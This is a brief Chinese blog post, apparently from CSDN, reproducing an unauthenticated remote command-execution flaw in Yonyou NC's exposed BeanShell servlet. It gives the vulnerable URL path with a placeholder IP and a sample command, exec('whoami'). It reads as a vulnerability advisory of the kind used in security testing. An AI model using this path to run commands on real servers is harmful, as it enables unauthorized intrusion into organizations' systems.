用友bsh.servlet.BshServlet命令执行

漏洞简介nc存在一个未授权的页面，在无需登陆系统的情况下，攻击者可通过BeanShell测试接口直接执行任意命令，恶意攻击者成功利用该漏洞可获得目标系统管理权限。漏洞复现漏洞地址http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet在Script框输入要执行的命令，点击Evaluate即可exec("whoami")漏洞检测...

安全小工坊

5456人浏览 · 2021-06-04 08:32:55

安全小工坊  ·  2021-06-04 08:32:55 发布

漏洞简介

nc存在一个未授权的页面，在无需登陆系统的情况下，攻击者可通过BeanShell测试接口直接执行任意命令，恶意攻击者成功利用该漏洞可获得目标系统管理权限。

漏洞复现

漏洞地址

http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet

在Script框输入要执行的命令，点击Evaluate即可

exec("whoami")

漏洞检测

CSDN学习社区

CSDN联合极客时间，共同打造面向开发者的精品内容学习社区，助力成长！

加入社区

更多推荐

• · Kaldi之父，IEEE Fellow，小米首席语音科学家Daniel Povey将出席2024全球机器学习技术大会并发表演讲！
• · 探索神经网络在商品销售和图像识别中的应用
• · 基于stm32F103的座面声控台灯

Kaldi之父，IEEE Fellow，小米首席语音科学家Daniel Povey将出席2024全球机器学习技术大会并发表演讲！

CSDN学习社区

探索神经网络在商品销售和图像识别中的应用

CSDN学习社区

基于stm32F103的座面声控台灯

CSDN学习社区

欢迎加入社区

取消 确定